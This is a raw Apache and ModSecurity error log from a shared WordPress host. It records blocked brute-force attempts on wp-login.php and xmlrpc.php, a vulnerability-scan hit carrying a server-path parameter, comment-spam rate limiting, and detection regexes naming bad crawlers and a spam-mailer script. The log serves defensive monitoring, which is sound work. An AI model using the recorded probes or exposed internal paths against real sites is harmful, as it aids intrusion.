[Tue May 26 13:59:23.638130 2026] [security2:error] [pid 560287:tid 560472] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ45mX5s6sDS3wJVcy_gAAALg"]
[Tue May 26 13:59:23.710413 2026] [security2:error] [pid 555743:tid 555881] [client 202.141.30.10:35365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ48jqAquC0YaxQjDNaQAAARI"]
[Tue May 26 13:59:23.710901 2026] [security2:error] [pid 555743:tid 555881] [client 202.141.30.10:35365] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ48jqAquC0YaxQjDNaQAAARI"]
[Tue May 26 13:59:23.873218 2026] [security2:error] [pid 560287:tid 560535] [client 129.222.147.134:2145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ45mX5s6sDS3wJVczCwAAAPU"]
[Tue May 26 13:59:23.873348 2026] [security2:error] [pid 560287:tid 560535] [client 129.222.147.134:2145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ45mX5s6sDS3wJVczCwAAAPU"]
[Tue May 26 13:59:24.548093 2026] [security2:error] [pid 560287:tid 560423] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ5JmX5s6sDS3wJVczDQAAAIo"]
[Tue May 26 13:59:25.183064 2026] [security2:error] [pid 555743:tid 555846] [remote 37.187.156.42:42078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVZ5MjqAquC0YaxQjDNewABK2Y"]
[Tue May 26 13:59:25.415427 2026] [security2:error] [pid 560287:tid 560346] [remote 114.119.129.110:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVZ5ZmX5s6sDS3wJVczHAAAyDo"]
[Tue May 26 13:59:26.483956 2026] [security2:error] [pid 560287:tid 560435] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ5pmX5s6sDS3wJVczLgAAAJY"]
[Tue May 26 13:59:26.957813 2026] [security2:error] [pid 560287:tid 560431] [client 172.86.76.182:63776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.76.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ5pmX5s6sDS3wJVczRwAAAJI"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:59:26.957942 2026] [security2:error] [pid 560287:tid 560431] [client 172.86.76.182:63776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ5pmX5s6sDS3wJVczRwAAAJI"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:59:27.058314 2026] [security2:error] [pid 560287:tid 560432] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ5pmX5s6sDS3wJVczOwAAAJM"]
[Tue May 26 13:59:27.406488 2026] [security2:error] [pid 560287:tid 560374] [remote 95.211.96.182:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.96.211.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVZ55mX5s6sDS3wJVczUQAAuFU"]
[Tue May 26 13:59:27.557194 2026] [security2:error] [pid 560287:tid 560500] [client 113.22.113.75:58976] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ55mX5s6sDS3wJVczUgAAANM"]
[Tue May 26 13:59:28.071448 2026] [security2:error] [pid 560287:tid 560495] [client 172.86.76.182:63842] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ55mX5s6sDS3wJVczXwAAAM4"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:59:28.646064 2026] [security2:error] [pid 560287:tid 560518] [client 114.119.132.52:42291] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahVZ6JmX5s6sDS3wJVczaAAAAOQ"]
[Tue May 26 13:59:28.710136 2026] [security2:error] [pid 560287:tid 560500] [client 113.22.113.75:58976] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ55mX5s6sDS3wJVczUgAAANM"]
[Tue May 26 13:59:28.710192 2026] [security2:error] [pid 560287:tid 560500] [client 113.22.113.75:58976] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ55mX5s6sDS3wJVczUgAAANM"]
[Tue May 26 13:59:28.743931 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ6JmX5s6sDS3wJVczZAAAAPI"]
[Tue May 26 13:59:30.024439 2026] [security2:error] [pid 560287:tid 560429] [client 113.22.113.75:59126] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ6pmX5s6sDS3wJVczdgAAAJA"]
[Tue May 26 13:59:30.294562 2026] [security2:error] [pid 560287:tid 560523] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ6ZmX5s6sDS3wJVczdAAAAOk"]
[Tue May 26 13:59:30.426141 2026] [security2:error] [pid 560287:tid 560429] [client 113.22.113.75:59126] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ6pmX5s6sDS3wJVczdgAAAJA"]
[Tue May 26 13:59:31.722564 2026] [security2:error] [pid 560287:tid 560486] [client 113.22.113.75:59214] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ65mX5s6sDS3wJVczmQAAAMU"]
[Tue May 26 13:59:32.058042 2026] [security2:error] [pid 560287:tid 560482] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ65mX5s6sDS3wJVczlwAAAME"]
[Tue May 26 13:59:32.112010 2026] [security2:error] [pid 560287:tid 560486] [client 113.22.113.75:59214] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ65mX5s6sDS3wJVczmQAAAMU"]
[Tue May 26 13:59:33.417678 2026] [security2:error] [pid 555743:tid 555873] [client 113.22.113.75:59326] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ7cjqAquC0YaxQjDNsAAAAQo"]
[Tue May 26 13:59:33.814684 2026] [security2:error] [pid 555743:tid 555873] [client 113.22.113.75:59326] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ7cjqAquC0YaxQjDNsAAAAQo"]
[Tue May 26 13:59:33.917138 2026] [security2:error] [pid 560287:tid 560382] [remote 103.255.134.61:53340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.134.255.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVZ7ZmX5s6sDS3wJVczrAAA_V0"]
[Tue May 26 13:59:33.944508 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ7ZmX5s6sDS3wJVczqgAAAOY"]
[Tue May 26 13:59:34.086357 2026] [security2:error] [pid 560287:tid 560491] [client 129.222.147.134:64889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ7pmX5s6sDS3wJVczrQAAAMo"]
[Tue May 26 13:59:34.094353 2026] [security2:error] [pid 560287:tid 560491] [client 129.222.147.134:64889] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ7pmX5s6sDS3wJVczrQAAAMo"]
[Tue May 26 13:59:34.769658 2026] [security2:error] [pid 555743:tid 555979] [client 202.141.30.10:35582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ7sjqAquC0YaxQjDNuwAAAXQ"]
[Tue May 26 13:59:34.769846 2026] [security2:error] [pid 555743:tid 555979] [client 202.141.30.10:35582] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ7sjqAquC0YaxQjDNuwAAAXQ"]
[Tue May 26 13:59:34.991459 2026] [security2:error] [pid 555743:tid 555775] [remote 47.128.51.8:33406] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/2022/09/29/managing-performance-expectations/"] [unique_id "ahVZ7sjqAquC0YaxQjDNwgABfx8"]
[Tue May 26 13:59:35.106931 2026] [security2:error] [pid 560287:tid 560523] [client 113.22.113.75:59422] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ75mX5s6sDS3wJVczuwAAAOk"]
[Tue May 26 13:59:35.499349 2026] [security2:error] [pid 555743:tid 555991] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ78jqAquC0YaxQjDNxQAAAYA"]
[Tue May 26 13:59:35.554504 2026] [security2:error] [pid 560287:tid 560523] [client 113.22.113.75:59422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ75mX5s6sDS3wJVczuwAAAOk"]
[Tue May 26 13:59:36.126519 2026] [security2:error] [pid 560287:tid 560505] [client 146.174.184.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ75mX5s6sDS3wJVczxAAAANc"]
[Tue May 26 13:59:36.849772 2026] [security2:error] [pid 560287:tid 560478] [client 113.22.113.75:59554] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ8JmX5s6sDS3wJVcz3gAAAL4"]
[Tue May 26 13:59:37.032406 2026] [security2:error] [pid 560287:tid 560426] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ8JmX5s6sDS3wJVcz1gAAAI0"]
[Tue May 26 13:59:37.277427 2026] [security2:error] [pid 560287:tid 560478] [client 113.22.113.75:59554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ8JmX5s6sDS3wJVcz3gAAAL4"]
[Tue May 26 13:59:38.444160 2026] [security2:error] [pid 560287:tid 560509] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ8pmX5s6sDS3wJVc0AQAAANs"]
[Tue May 26 13:59:38.926169 2026] [security2:error] [pid 560287:tid 560364] [remote 74.7.241.58:37430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVZ8pmX5s6sDS3wJVc0FAAAzks"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 13:59:40.526736 2026] [security2:error] [pid 555743:tid 555988] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ9MjqAquC0YaxQjDN6gAAAX0"]
[Tue May 26 13:59:41.424640 2026] [core:crit] [pid 555743:tid 555985] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:59:42.261548 2026] [security2:error] [pid 555743:tid 555911] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ9cjqAquC0YaxQjDOAwAAATA"]
[Tue May 26 13:59:42.903268 2026] [security2:error] [pid 560287:tid 560387] [remote 193.42.61.12:40440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVZ9pmX5s6sDS3wJVc0OgAA_GI"]
[Tue May 26 13:59:42.947777 2026] [security2:error] [pid 560287:tid 560399] [remote 124.156.212.23:12688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVZ9pmX5s6sDS3wJVc0PAAAn24"]
[Tue May 26 13:59:44.077953 2026] [security2:error] [pid 555743:tid 555944] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ98jqAquC0YaxQjDOFwAAAVE"]
[Tue May 26 13:59:44.367904 2026] [security2:error] [pid 555743:tid 555980] [client 129.222.147.134:48384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ-MjqAquC0YaxQjDOJAAAAXU"]
[Tue May 26 13:59:44.375485 2026] [security2:error] [pid 555743:tid 555980] [client 129.222.147.134:48384] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ-MjqAquC0YaxQjDOJAAAAXU"]
[Tue May 26 13:59:45.051490 2026] [security2:error] [pid 555743:tid 555964] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ-MjqAquC0YaxQjDOJwAAAWU"]
[Tue May 26 13:59:45.415260 2026] [security2:error] [pid 555743:tid 555957] [client 202.141.30.10:35496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ-cjqAquC0YaxQjDONQAAAV4"]
[Tue May 26 13:59:45.415395 2026] [security2:error] [pid 555743:tid 555957] [client 202.141.30.10:35496] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ-cjqAquC0YaxQjDONQAAAV4"]
[Tue May 26 13:59:45.700828 2026] [security2:error] [pid 560287:tid 560534] [client 185.191.171.10:39254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-13th/day/2025-03-12/"] [unique_id "ahVZ-ZmX5s6sDS3wJVc0WAAAAPQ"]
[Tue May 26 13:59:45.700972 2026] [security2:error] [pid 560287:tid 560534] [client 185.191.171.10:39254] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-13th/day/2025-03-12/"] [unique_id "ahVZ-ZmX5s6sDS3wJVc0WAAAAPQ"]
[Tue May 26 13:59:46.831814 2026] [security2:error] [pid 560287:tid 560543] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ-pmX5s6sDS3wJVc0ZQAAAPs"]
[Tue May 26 13:59:46.884861 2026] [security2:error] [pid 560287:tid 560350] [remote 141.95.202.18:37058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVZ-pmX5s6sDS3wJVc0agAApz4"]
[Tue May 26 13:59:47.206932 2026] [security2:error] [pid 560287:tid 560492] [client 74.7.244.11:37950] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "alpha-bau.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVZ-5mX5s6sDS3wJVc0cAAAy20"]
[Tue May 26 13:59:48.870481 2026] [security2:error] [pid 560287:tid 560527] [client 113.22.113.75:60284] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ_JmX5s6sDS3wJVc0iQAAAO0"]
[Tue May 26 13:59:48.989436 2026] [security2:error] [pid 555743:tid 555899] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ_MjqAquC0YaxQjDOUwAAASQ"]
[Tue May 26 13:59:49.967303 2026] [security2:error] [pid 560287:tid 560527] [client 113.22.113.75:60284] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ_JmX5s6sDS3wJVc0iQAAAO0"]
